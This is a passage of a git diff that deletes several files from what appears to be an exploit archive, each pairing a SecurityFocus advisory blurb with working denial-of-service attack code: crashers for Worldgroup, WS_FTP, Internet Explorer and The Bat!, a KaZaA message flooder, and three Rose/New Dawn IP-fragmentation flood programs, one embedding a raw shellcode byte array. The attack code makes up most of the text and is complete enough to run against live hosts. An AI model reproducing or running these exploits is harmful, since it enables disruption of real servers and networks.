send(sock,cgiPage[5],strlen(cgiPage[5]),0); - send(sock,cr,1,0); - memset(cgiBuff, 0, sizeof(cgiBuff)); - cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; - printf(">> %s\n<< %s", cgiPage[5], cgiBuff); - - printf("Try reconnect to %s\n", argv[1]); - WSACleanup(); - return 0; -} diff --git a/platforms/windows/remote/21306.c b/platforms/windows/remote/21306.c deleted file mode 100755 index 2b60f0590..000000000 --- a/platforms/windows/remote/21306.c +++ /dev/null 
@@ -1,110 +0,0 @@ -source: http://www.securityfocus.com/bid/4186/info - -Galacticomm Worldgroup is a community building package of both client and server software for Microsoft Windows. Worldgroup is based on BBS software, and includes web and ftp servers. - -A vulnerability has been reported in the web server included with Worldgroup. If a HTTP GET request is received by the server consisting of a long string of arbitrary characters, the server will crash. A restart may be required in order to regain normal functionality. - -Earlier versions of Worldgroup may share this vulnerability. - -/* - by Limpid Byte project - http://lbyte.void.ru - lbyte@host.sk - -Worldgroup Server Denial of Service for -Windows 9x/ME only. -Error between system fuction windows and -worldgroup from web interface. -REGUEST: -GET /signup/a.[aaaaaaaa....aaaa] - -*/ - -#include -#include -#include -#include - -#define FOUND "200" - -int main(int argc, char *argv[]) -{ - int sock, count; - struct sockaddr_in blah; - struct hostent *he; - char cgiBuff[1024]; - WSADATA wsaData; - - if (argc < 2) - { - printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.\n"); - printf("Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\n"); - printf(" USAGE : www_dos.exe [HOST] \n"); - printf(" example : www_dos.exe 127.0.0.1 \n"); - exit(1); - } - - if(WSAStartup(0x101,&wsaData)) - { - printf("Unable to initialize WinSock lib.\n"); - exit(1); - } - printf("Let's crash the World!\n"); - printf("Coded by the [eaSt]:\n"); - printf("\nScanning %s on port 80...\n\n", argv[1]); - - for (count = 0; count < 94; count++) - { - sock = socket(AF_INET,SOCK_STREAM,0); - blah.sin_family=AF_INET; - blah.sin_addr.s_addr=inet_addr(argv[1]); - blah.sin_port=htons(80); - if ((he = gethostbyname(argv[1])) != NULL) - { - memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length); - } - else - { - if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE) - { - WSACleanup(); 
- exit(1); - } - } - - if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0) - { - WSACleanup(); - exit(1); - } - - memset(cgiBuff, 0, sizeof(cgiBuff)); - sprintf(cgiBuff, "GET /signup/"); - memset(cgiBuff + 12, 'a', 219 + count); - sprintf(cgiBuff + 12 + 219 + count, ".txt?=../test.txt HTTP/1.0\n\n"); - printf("Sending: %d symbols request\n", strlen(cgiBuff)); - - send(sock,cgiBuff,strlen(cgiBuff),0); - memset(cgiBuff, 0, sizeof(cgiBuff)); - if(!recv(sock,cgiBuff,sizeof(cgiBuff),0)) { - printf("Crashed\n"); - } - else { - cgiBuff[32] = 0; - if (strstr(cgiBuff,FOUND)) - { - printf("Send (%s)\n", cgiBuff); - } - else - { - printf("Not Found (%s)\n", cgiBuff); - } - } - - closesocket(sock); - } - - printf("Try reconnect to %s\n", argv[1]); - WSACleanup(); - return 0; -} diff --git a/platforms/windows/remote/21307.txt b/platforms/windows/remote/21307.txt deleted file mode 100755 index 683cb2fde..000000000 --- a/platforms/windows/remote/21307.txt +++ /dev/null @@ -1,14 +0,0 @@ -source: http://www.securityfocus.com/bid/4187/info - -The Bat! is an e-mail client for Microsoft Windows operating systems. - -A problem occurs with The Bat! when it is configured to save attachments seperately from the body of a message. It is possible to include a MS-DOS device name (such as CON, AUX, PRN, etc.) in the filename of the attachment to cause a denial of service to an e-mail client with this configuration. - -This appears to be an issue with The Bat! version 1.53d. Earlier versions do not appear to be affected. - -bash-2.03$ sendmail -U test@test.com -From: test -To: test -Content-Type: apllication/exe; name=lpt1 - -Test \ No newline at end of file diff --git a/platforms/windows/remote/21653.c b/platforms/windows/remote/21653.c deleted file mode 100755 index bf437894d..000000000 --- a/platforms/windows/remote/21653.c +++ /dev/null 
@@ -1,95 +0,0 @@ -source: http://www.securityfocus.com/bid/5317/info - -KaZaA may consume large amounts of CPU when processing a sequence of large messages. It is possible for an attacker to flood a vulnerable system with a large number of messages, resulting in a denial of service condition. - -/* - kazaa denial of service attack - by Josh and omega -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define PORT 1214 - - -int main(int argc, char *argv[]) -{ - int fd, numbytes, randnum, k; - struct hostent *host; - struct sockaddr_in them; - char buf2[4026]; - char buf[5000]; - char *bigboy; - int i, size, j; - - - memset(buf2, 'a', sizeof(buf2)); - buf2[sizeof(buf2)-1]='\0'; - srand(time(NULL)); - - if (argc < 5) - { - fprintf(stderr,"usage: %s <(this*4026) bytes per message> \n", argv[0]); - exit(1); - } - if ((host=gethostbyname(argv[1])) == NULL) - { - perror("gethostbyname"); - exit(1); - } - - them.sin_family = AF_INET; - them.sin_port = htons(PORT); - them.sin_addr = *((struct in_addr *)host->h_addr); - memset(&(them.sin_zero), '\0', 8); - - - size=(4042*atoi(argv[2]))+280+1; - bigboy=(char *)malloc(size); - - snprintf(bigboy, size, "GET /.message HTTP/1.1\nHost: 68.10.112.148:1214\nUserAgent: KazaaClient Jan 18 2002 18:53:21\nX-Kazaa-Username: 31337h4x0r\nX-Kazaa-Network: KaZaA\nX-Kazaa-IP: %d:1214\nX-Kazaa-SupernodeIP: %d:1214\nConnection: open\nX-Kazaa-IMTo: %s@KaZaA\nX-Kazaa-IMType: user_text\n", randnum, randnum, argv[3]); - - /* the msg appears as one msg to the receiver, but comes in intervals of 4096 bytes... */ - snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %s\n", buf2); - for(k=0;k \n\n"; - - exit(); - -} - - -$host = $ARGV[0]; - -$port = $ARGV[1]; - -$numc = $ARGV[2]; - - - -use Net::Telnet (); - -$t = new Net::Telnet; - -$t->open(Host => $host,Port => $port); - -foreach(1...$numc) { - - $t->waitfor('/.*host.*/'); - - $t->print('localhost:23'); - -} 
diff --git a/platforms/windows/remote/24211.txt b/platforms/windows/remote/24211.txt
deleted file mode 100755
index 28fd4085b..000000000
--- a/platforms/windows/remote/24211.txt
+++ /dev/null
@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/10552/info
-
-A vulnerability is reported to exist in Internet Explorer that may allow an attacker to cause the application to crash. The issue presents itself when a user attempts to invoke the "Save As" option on a malicious HREF URI.
-
-When this URI is processed the issue leads to a crash in the running instance of Internet Explorer and all windows spawned from this instance.
-
-
Right Click aOn Me And Click "Save Target As"
\ No newline at end of file
diff --git a/platforms/windows/remote/24416.txt b/platforms/windows/remote/24416.txt
deleted file mode 100755
index ba09bfe15..000000000
--- a/platforms/windows/remote/24416.txt
+++ /dev/null
@@ -1,18 +0,0 @@
-source: http://www.securityfocus.com/bid/11065/info
-
-WS_FTP Server is reported prone to a remote denial of service vulnerability. This issue presents itself when the application processes a malformed file path through the 'cd' command.
-
-WS_FTP Server version 5.0.2 is reported prone to this issue, however, other versions may be affected as well.
-
-E:\>ftp localhost
-Connected to ibm.
-220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
-220-Fri Aug 27 14:12:19 2004
-220-29 days remaining on evaluation.
-220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
-User (ibm:(none)): ftp
-331 Password required
-Password:
-230 user logged in
-ftp> cd a../a
-Connection closed by remote host.
\ No newline at end of file
diff --git a/platforms/windows/remote/24634.c b/platforms/windows/remote/24634.c
deleted file mode 100755
index aa6e8499b..000000000
--- a/platforms/windows/remote/24634.c
+++ /dev/null
@@ -1,233 +0,0 @@ -source: http://www.securityfocus.com/bid/11258/info - -Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability. - -The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets. - -The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack". - -A remote attacker may exploit this vulnerability to deny service to an affected computer. - -Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected. - - -/*** - ROSE attack (variation 2) (chuck (at) lemure.net) - - Discovered by: - gandalf (at) digital.net - - code modified from large IGMP attack by: - Kox by Coolio (coolio (at) k-r4d.com) - - Sends out small IP fragments totalling up to a large - ICMP packet. Then repeatedly sends last IP Fragment forcing - reassembly code to traverse to last IP fragment in order to - do a free() followed by a malloc(). Or so it seems. - - Reportedly works for TCP / UDP as well, since this is - a IP layer attack. 
- - -***/ - -/* just a thousand kills win XP */ - -#define NUM_PACKETS 100 - - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include - -void usage(char *arg) -{ - printf("Rose attack\n"); - printf("Usage: %s [source]\n", arg); - printf("If source not specified, will send out from random ip's\n"); - exit(1); -} - - -unsigned int randip() -{ - struct hostent *he; - struct sockaddr_in sin; - char *buf = (char *)calloc(1, sizeof(char) * 16); - - sprintf(buf, "%d.%d.%d.%d", - (random()%191)+23, - (random()%253)+1, - (random()%253)+1, - (random()%253)+1); - - return inet_addr(buf); - -} - -unsigned short in_cksum(unsigned short *buh, int len) -{ - register long sum = 0; - unsigned short oddbyte; - register unsigned short answer; - - while(len > 1) { - sum += *buh++; - len -= 2; - } - - if(len == 1) { - oddbyte = 0; - *((unsigned char *)&oddbyte) = *(unsigned char *)buh; - sum += oddbyte; - } - - sum = (sum >> 16) + (sum & 0xFFFF); - sum += (sum >> 16); - answer = ~sum; - return answer; -} - -int fire_away(struct sockaddr_in *victim, unsigned long src) -{ - int SMALLICMP = 1; - unsigned char *pkt; - struct iphdr *ip; - struct igmphdr *igmp; - struct icmphdr *icmp_pkt; - struct utsname *un; - struct passwd *p; - int idList[NUM_PACKETS]; - unsigned long j; - int i, s; - int id = (random() % 40000) + 500; - for (i=0;iversion = 4; - ip->ihl = (sizeof *ip) / 4; - ip->ttl = 255; - ip->tot_len = htons(SMALLICMP); - ip->protocol = 1; - ip->id = htons(id); - ip->frag_off = htons(IP_MF); - ip->saddr = src; - ip->daddr = victim->sin_addr.s_addr; - ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr)); - - - icmp_pkt->type = ICMP_ECHO; - icmp_pkt->code = 0; - icmp_pkt->checksum = 1000; - icmp_pkt->un.echo.id = random() % 255; - icmp_pkt->un.echo.sequence = random() % 255; - - for(i = sizeof(struct iphdr) + sizeof(struct icmphdr) + 1; - i < SMALLICMP; i++){ - pkt[i] = random() 
% 255; - - } - - if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { - perror("error: socket()"); - return 1; - } - - printf(" Sending out series of small fragments\r\n"); - - for(i=0;iid = htons(idList[i]); - for (j=0; j<8170; j += SMALLICMP + 1){ - ip->frag_off = htons(j | IP_MF); - if(sendto(s, pkt, - SMALLICMP + sizeof(struct iphdr), - 0, (struct sockaddr *)victim, - sizeof(struct sockaddr_in)) == -1) { - perror("error: sendto()"); - return 1; - } - } - } - - printf(" Sending out tailing fragments\r\n"); - /* big frag at end... */ - /* sending a large amount of the end fragments over and - over. This is definitely overkill, but seems to work */ - for (j=0;j<9999*NUM_PACKETS;j++){ - for(i=0;iid=htons(idList[i]); - ip->frag_off = htons(8190|IP_MF); - //ip->frag_off = htons(8100 | IP_MF); - sendto(s, pkt, sizeof(struct iphdr) + SMALLICMP, - 0, (struct sockaddr *)victim, - sizeof(struct sockaddr_in)); - /* if you do sleep, CPU usage goes way down. But memory usage - still creeps upward */ - //usleep(100); //sleep after every trailing packet - } - usleep(100); //sleep after every series of NUM_PACKETS - } - free(pkt); - close(s); - return 0; -} - -int main(int argc, char *argv[]) -{ - struct sockaddr_in victim; - struct hostent *he; - unsigned long source; - int i; - - srandom(time(NULL)); - - if(argc < 2) - usage(argv[0]); - - if((he = gethostbyname(argv[1])) == NULL) { - herror(argv[1]); - exit(1); - } - - if (argc > 2){ - source = inet_addr(argv[2]); - } - else { - source = randip(); - } - - memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length); - victim.sin_port = htons(0); - victim.sin_family = PF_INET; - - printf("Sending ICMP fragments: \r\n"); - fflush(stdout); - fire_away(&victim, source); - if (argc < 3){ - source = randip(); - } - - fflush(stdout); - printf("\nDONE\n"); - fflush(stdout); -} diff --git a/platforms/windows/remote/24635.c b/platforms/windows/remote/24635.c deleted file mode 100755 index 79cb2aadc..000000000 
--- a/platforms/windows/remote/24635.c
+++ /dev/null
@@ -1,245 +0,0 @@ -source: http://www.securityfocus.com/bid/11258/info - -Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability. - -The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets. - -The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack". - -A remote attacker may exploit this vulnerability to deny service to an affected computer. - -Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected. - -/*** - ROSE attack (chuck (at) lemure.net) - - Discovered by: - gandalf@digital.net - - code modified from large IGMP attack by: - Kox by Coolio (coolio@k-r4d.com) - - - Sends out first and last ICMP packet echo request. - Reportedly works for TCP / UDP as well, since this is - a IP layer attack. - - Eats up all available packets for fragmentation reassembly. - - -***/ - -/* just a thousand kills win XP */ - -#define NUM_PACKETS 1000 - - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include - -/* Figured I try sending some shell code for my random payload... 
- doesn't do anything -*/ - -char code[] = -"\xe8\x38\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xe5\x49\x86" -"\x49\xa4\xad\x2e\xe9\xa4\x1a\x70\xc7\xd9\x09\xf5\xad\xcb\xed\xfc" -"\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2\x73\xad\xd9\x05\xce\x72\xfe\xb3" -"\x16\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c\x00\x01\x5b\x54\x89" -"\xe5\x89\x5d\x00\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c" -"\xad\x8b\x58\x08\xeb\x0c\x8d\x57\x2c\x51\x52\xff\xd0\x89\xc3\x59" -"\xeb\x10\x6a\x08\x5e\x01\xee\x6a\x0a\x59\x8b\x7d\x00\x80\xf9\x06" -"\x74\xe4\x51\x53\xff\x34\x8f\xe8\x90\x00\x00\x00\x59\x89\x04\x8e" -"\xe2\xeb\x31\xff\x66\x81\xec\x90\x01\x54\x68\x01\x01\x00\x00\xff" -"\x55\x20\x57\x57\x57\x57\x47\x57\x47\x57\xff\x55\x1c\x89\xc3\x31" -"\xff\x57\x57\x68\x02\x00\x22\x11\x89\xe6\x6a\x10\x56\x53\xff\x55" -"\x18\x57\x53\xff\x55\x14\x57\x56\x53\xff\x55\x10\x89\xc2\x66\x81" -"\xec\x54\x00\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\x89\xd7\xc6" -"\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x7c\x24\x48\x89\x7c\x24\x4c" -"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49" -"\x51\x51\xff\x75\x00\x51\xff\x55\x30\x89\xe1\x68\xff\xff\xff\xff" -"\xff\x31\xff\x55\x2c\x57\xff\x55\x0c\xff\x55\x28\x53\x55\x56\x57" -"\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18" -"\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc" -"\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c" -"\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c" -"\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d" -"\x5b\xc2\x08\x00"; - -void usage(char *arg) -{ - printf("Rose attack\n"); - printf("Usage: %s [source]\n", arg); - printf("If source not specified, will send out from random ip's\n"); - exit(1); -} - - -unsigned int randip() -{ - struct hostent *he; - struct sockaddr_in sin; - char *buf = (char *)calloc(1, sizeof(char) * 16); - - sprintf(buf, "%d.%d.%d.%d", - (random()%191)+23, - (random()%253)+1, - (random()%253)+1, - (random()%253)+1); - - - - return 
inet_addr(buf); - -} - -unsigned short in_cksum(unsigned short *buh, int len) -{ - register long sum = 0; - unsigned short oddbyte; - register unsigned short answer; - - while(len > 1) { - sum += *buh++; - len -= 2; - } - - if(len == 1) { - oddbyte = 0; - *((unsigned char *)&oddbyte) = *(unsigned char *)buh; - sum += oddbyte; - } - - sum = (sum >> 16) + (sum & 0xFFFF); - sum += (sum >> 16); - answer = ~sum; - return answer; -} - -int rose(struct sockaddr_in *victim, unsigned long src) -{ - int SMALLICMP = 1000; - unsigned char *pkt; - struct iphdr *ip; - struct igmphdr *igmp; - struct icmphdr *icmp_pkt; - struct utsname *un; - struct passwd *p; - - int i, s,j; - int id = (random() % 40000) + 500; - - pkt = (unsigned char *)calloc(1, SMALLICMP); - ip = (struct iphdr *)pkt; - icmp_pkt = (struct icmphdr *)(pkt + sizeof(struct iphdr)); - ip->version = 4; - ip->ihl = (sizeof *ip) / 4; - ip->ttl = 255; - ip->tot_len = htons(SMALLICMP); - ip->protocol = 1; - ip->id = htons(id); - ip->frag_off = htons(IP_MF); - ip->saddr = src; - ip->daddr = victim->sin_addr.s_addr; - ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr)); - - icmp_pkt->type = ICMP_ECHO; - icmp_pkt->code = 0; - icmp_pkt->checksum = 1000; - icmp_pkt->un.echo.id = random() % 255; - icmp_pkt->un.echo.sequence = random() % 255; - - for(i = sizeof(struct iphdr) + sizeof(struct icmphdr) + 1; - i < SMALLICMP; i++){ - //pkt[i] = random() % 255; - pkt[i] = '\x00'; - } - j=0; - for (i=sizeof(struct iphdr) + sizeof(struct icmphdr) + 500; - i < sizeof(struct iphdr) + sizeof(struct icmphdr) + 500 + 356; - i++){ - pkt[i] = code[j]; - j++; - } - if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { - perror("error: socket()"); - return 1; - } - - if(sendto(s, pkt, SMALLICMP, 0, (struct sockaddr *)victim, - sizeof(struct sockaddr_in)) == -1) { - perror("error: sendto()"); - return 1; - } - - /* big frag at end... 
*/ - - ip->frag_off = htons(8100); - //ip->frag_off = htons(8100 | IP_MF); - sendto(s, pkt, SMALLICMP, 0, (struct sockaddr *)victim, - sizeof(struct sockaddr_in)); - - free(pkt); - close(s); - usleep(1000); - return 0; -} - -int main(int argc, char *argv[]) -{ - struct sockaddr_in victim; - struct hostent *he; - unsigned long source; - int i; - - srandom(time(NULL)); - - if(argc < 2) - usage(argv[0]); - - if((he = gethostbyname(argv[1])) == NULL) { - herror(argv[1]); - exit(1); - } - - if (argc > 2){ - source = inet_addr(argv[2]); - } - else { - source = randip(); - } - - memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length); - victim.sin_port = htons(0); - victim.sin_family = PF_INET; - - printf("Sending ICMP fragments: "); - fflush(stdout); - for(i = 0; i < NUM_PACKETS; i++) - { - rose(&victim, source); - if (argc < 3){ - source = randip(); - } - printf("%d\n", i); - fflush(stdout); - } - printf("\nDONE\n"); - fflush(stdout); -} - - diff --git a/platforms/windows/remote/24636.c b/platforms/windows/remote/24636.c deleted file mode 100755 index 3ef793cf3..000000000 --- a/platforms/windows/remote/24636.c +++ /dev/null 
@@ -1,378 +0,0 @@ -source: http://www.securityfocus.com/bid/11258/info - -Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability. - -The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets. - -The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack". - -A remote attacker may exploit this vulnerability to deny service to an affected computer. - -Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected. - - -/*-------------------------------------------------------------*/ -/* - Implementation of Rose Attack described by Gandalf gandalf at digital.net - Reference: Bugtraq, 30 mars 2004, "IPv4 fragmentation, The Rose Attack" - - NewDawn3.c written by Ken Hollis based on the code rose.c - written by Laurent Constantin and rose2.c written by chuck - modified from large IGMP attack by Kox by Coolio (coolio (at) k-r4d.com) - - Program allows choice of TCP or UDP, number of packets to fragment, number - of fragments per packet and number of times the last fragment is - rewritten. - - Based on a conversation where it was mentioned that a highly fragmented - packet would cause high CPU utilization if the last fragment was written - over and over again. As chuck says, death by a thousand cuts. - - NewDawn3 send 32 byte fragments. 
See: - http://digital.net/~gandalf/Rose_Frag_Attack_Explained.htm - - Usage : ./NewDawn3 type(1or2) ipaddress [port] [NumP] [Numt] [NumR] [NumF] [NumD] - Example: ./NewDawn3 1 1.2.3.4 80 5 9999 99999999 4080 2 - type : 1=tcp, 2=udp - ipaddress : address to test - port : optional port number (0 means random) - NumP : Number of packets to fragment (less than 1000) - NumT : Number of times last fragment is rewritten - NumR : Number of times to run test - NumF : Number of fragments per packet - NumD : Delta between fragements. 8 = 32 bytes blank - 64 bytes total between fragments (32 bytes - payload + 32 bytes blank = 64 bytes), - 5 = 8 bytes blank (32 bytes payload + 8 bytes - blank = 40 bytes total = 5 * 8). - < 5 = overlapping fragments - - - Library netwib must be installed: - http://www.laurentconstantin.com/en/netw/netwib/ - http://go.to/laurentconstantin - - To compile and run : - gcc -Wall -o NewDawn3 NewDawn3.c `netwib-config -lc` - ./NewDawn3 1 www.example.com 80 - - The command: - ./NewDawn3 1 10.12.14.16 - Is equivalent to: - ./NewDawn3 1 10.12.14.16 0 5 9999 99999999 1021 8 - Where: - ./NewDawn3 = Program Name - 1 = TCP - 10.12.14.16 = IP Address - 0 = Random port numbers - 5 = Five packets to fragment before staring next set of packets - 9999 = The number of times to rewrite the last fragment of - the five packets - 99999999 = The number of times to run this entire attack - 1021 = The number of middle fragments to write. - 8 = 64 bytes between 32 byte fragments (8 bytes * 8 = 64) - - This was successfully tested with netwib 5.12.0, under Linux - to test a Windows 2000 host. Local network is Ethernet. 
-*/ - -/*-------------------------------------------------------------*/ -// Test large number of packets -#define NUM_PACKETS 1000 -#define NUM_LAST 9999 -#define NUM_RUN 99999999 -#define NUM_FRAG 8170 -#define NUM_DELTA 8 - -#include -#include -#include - -/*-------------------------------------------------------------*/ -typedef enum { - ROSE_TYPE_TCP = 1, - ROSE_TYPE_UDP = 2 -} rose_type; - -/*-------------------------------------------------------------*/ -typedef struct { - rose_type type; - netwib_ip ipad; - netwib_port port; - netwib_bool display; - netwib_buf buf; - netwib_io *pio; -} rose_params; - -/*-------------------------------------------------------------*/ -static netwib_err rose_loop(rose_params *prp, int npack, int nrew, - int nrun, int nfrag, int ndelta) -{ - netwib_iphdr ipheader, ipstore[NUM_PACKETS]; - netwib_tcphdr tcpheader, tcpstore[NUM_PACKETS]; - netwib_udphdr udpheader, udpstore[NUM_PACKETS]; - netwib_buf payload; - netwib_uint32 numsent = 0; - int i, j, nrun2; - -printf("Packets %d Rewrite %d Runs %d Fragment packet to byte %d Delta %d\n\r", - npack, nrew, nrun, nfrag, ndelta); - - for (nrun2=0; nrun2type) { - case ROSE_TYPE_TCP : - netwib_er(netwib_tcphdr_initdefault(&tcpstore[i])); - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &tcpstore[i].src)); - if (prp->port == 0) { - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &tcpstore[i].dst)); - } else { - tcpstore[i].dst = prp->port; - } - break; - case ROSE_TYPE_UDP : - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &udpstore[i].src)); - if (prp->port == 0) { - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &udpstore[i].dst)); - } else { - udpstore[i].dst = prp->port; - } - break; - } - } - - for (i=0; ibuf); - ipheader = ipstore[i]; - ipheader.header.ip4.morefrag = NETWIB_TRUE; - ipheader.header.ip4.offsetfrag = 0; /* not necessary, but to be clear */ - ipheader.src.iptype = NETWIB_IPTYPE_IP4; - ipheader.src.ipvalue.ip4 = ipstore[i].src.ipvalue.ip4; - ipheader.dst = prp->ipad; - 
switch(prp->type) { - case ROSE_TYPE_TCP : - tcpheader = tcpstore[i]; - tcpheader.src = tcpstore[i].src; - tcpheader.dst = tcpstore[i].dst; - tcpheader.ack = NETWIB_TRUE; - netwib_er(netwib_buf_init_ext_text("1234567890123456789012345678", - &payload)); - netwib_er(netwib_pkt_append_iptcpdata(&ipheader, &tcpheader, &payload, - &prp->buf)); - break; - case ROSE_TYPE_UDP : - netwib_er(netwib_udphdr_initdefault(&udpheader)); - udpheader.src = udpstore[i].src; - udpheader.dst = udpstore[i].dst; - netwib_er(netwib_buf_init_ext_text("12345678901234567890123456789012", - &payload)); - netwib_er(netwib_pkt_append_ipudpdata(&ipheader, &udpheader, &payload, - &prp->buf)); - break; - } - if (prp->display) { - netwib_er(netwib_pkt_ip_display(&prp->buf, NULL, NETWIB_ENCODETYPE_ARRAY, - NETWIB_ENCODETYPE_DUMP)); - } - netwib_er(netwib_io_write(prp->pio, &prp->buf)); - - /* construct middle fragments */ - netwib__buf_reinit(&prp->buf); - ipheader.header.ip4.offsetfrag = 0x0008; - for(ipheader.header.ip4.offsetfrag = 0x0008 ; - ipheader.header.ip4.offsetfrag< nfrag; - ipheader.header.ip4.offsetfrag = ipheader.header.ip4.offsetfrag + - ndelta){ - netwib__buf_reinit(&prp->buf); - switch(prp->type) { - case ROSE_TYPE_TCP : - ipheader.protocol = NETWIB_IPPROTO_TCP; - break; - case ROSE_TYPE_UDP : - ipheader.protocol = NETWIB_IPPROTO_UDP; - break; - } - netwib_er(netwib_buf_init_ext_text("12345678901234567890123456789012", - &payload)); - netwib_er(netwib_pkt_append_ipdata(&ipheader, &payload, &prp->buf)); - if (prp->display) { - netwib_er(netwib_pkt_ip_display(&prp->buf, NULL, NETWIB_ENCODETYPE_ARRAY, - NETWIB_ENCODETYPE_DUMP)); - } - netwib_er(netwib_io_write(prp->pio, &prp->buf)); - } - - } - - printf("Rewriting %d packets last fragment %d times\r\n", - npack,nrew); fflush(stdout); - - /* construct last fragment and rewrite NUM_LAST times */ - for (j=0;jbuf); - for (i=0; iipad; - switch(prp->type) { - case ROSE_TYPE_TCP : - tcpheader = tcpstore[i]; - tcpheader.src = tcpstore[i].src; 
- tcpheader.dst = tcpstore[i].dst; - tcpheader.ack = NETWIB_TRUE; - ipheader.protocol = NETWIB_IPPROTO_TCP; - break; - case ROSE_TYPE_UDP : - udpheader.src = udpstore[i].src; - udpheader.dst = udpstore[i].dst; - ipheader.protocol = NETWIB_IPPROTO_UDP; - break; - } - - netwib__buf_reinit(&prp->buf); - ipheader.header.ip4.morefrag = NETWIB_FALSE; - ipheader.header.ip4.offsetfrag = 0x1FF0; - netwib_er(netwib_buf_init_ext_text("12345678901234567890123456789012", - &payload)); - netwib_er(netwib_pkt_append_ipdata(&ipheader, &payload, &prp->buf)); - if (prp->display) { - netwib_er(netwib_pkt_ip_display(&prp->buf, NULL, NETWIB_ENCODETYPE_ARRAY, - NETWIB_ENCODETYPE_DUMP)); - } - netwib_er(netwib_io_write(prp->pio, &prp->buf)); - } - } - /* dot display */ - if (!prp->display && (numsent%100)==0) { - printf("."); fflush(stdout); - } - numsent++; - } - - return(NETWIB_ERR_OK); -} - -/*-------------------------------------------------------------*/ -int main(int argc, char* argv[]) -{ - rose_params rp; - netwib_buf ipstr; - netwib_err ret; - int npack, nrew, nrun, nfrag, ndelta; - - /* initialize netwib */ - netwib_init(); - - /* check parameter count */ - if (argc < 3 || argc > 9) { - printf("Usage : %s type(1or2) ipaddress [port] [NumP] [Numt] [NumR] [NumF] [NumD]\n", argv[0]); - printf("Example: %s 1 1.2.3.4 80 5 9999 99999999 1021 8\n", argv[0]); - printf(" type : %d=tcp, %d=udp\n", ROSE_TYPE_TCP, ROSE_TYPE_UDP); - printf(" ipaddress : address to test\n"); - printf(" port : optional port number (0 means random)\n"); - printf(" NumP : Number of packets to fragment\n"); - printf(" NumT : Number of times last fragment is rewritten\n"); - printf(" NumR : Number of times to run test\n"); - printf(" NumF : Number of fragments per packet\n"); - printf(" NumD : Delta between fragements.\n"); - return(1); - } - - /* first parameter is type */ - rp.type = atoi(argv[1]); - switch(rp.type) { - case ROSE_TYPE_TCP : - case ROSE_TYPE_UDP : - break; - default : - printf("First parameter 
must be 1 or 2 (currently=%s)\n", argv[1]); - return(2); - } - - /* second parameter is IP address */ - netwib_er(netwib_buf_init_ext_text(argv[2], &ipstr)); - ret = netwib_ip_init_buf(&ipstr, NETWIB_IP_DECODETYPE_BEST, &rp.ipad); - if (ret != NETWIB_ERR_OK) { - printf("Second parameter must be an IP or hostname (currently=%s)\n", - argv[2]); - return(3); - } - - /* third parameter is port number */ - rp.port = 0; - if (argc > 3) { - rp.port = atoi(argv[3]); /* on error, set to 0, but that's ok */ - } - - /* fourth parameter is number of packets to fragment */ - npack = 5; - if (argc > 4) { - npack = atoi(argv[4]); /* on error, set to 1 */ - } - if (npack < 1) { npack = 1; } - if (npack > 1000) { npack = 1000; } - - /* fifth parameter is number of times packet is rewritten */ - nrew = NUM_LAST; - if (argc > 5) { - nrew = atoi(argv[5]); /* on error, set to 0, but that's ok */ - } - - /* sixth parameter is number of times to run the test */ - nrun = NUM_RUN; - if (argc > 6) { - nrun = 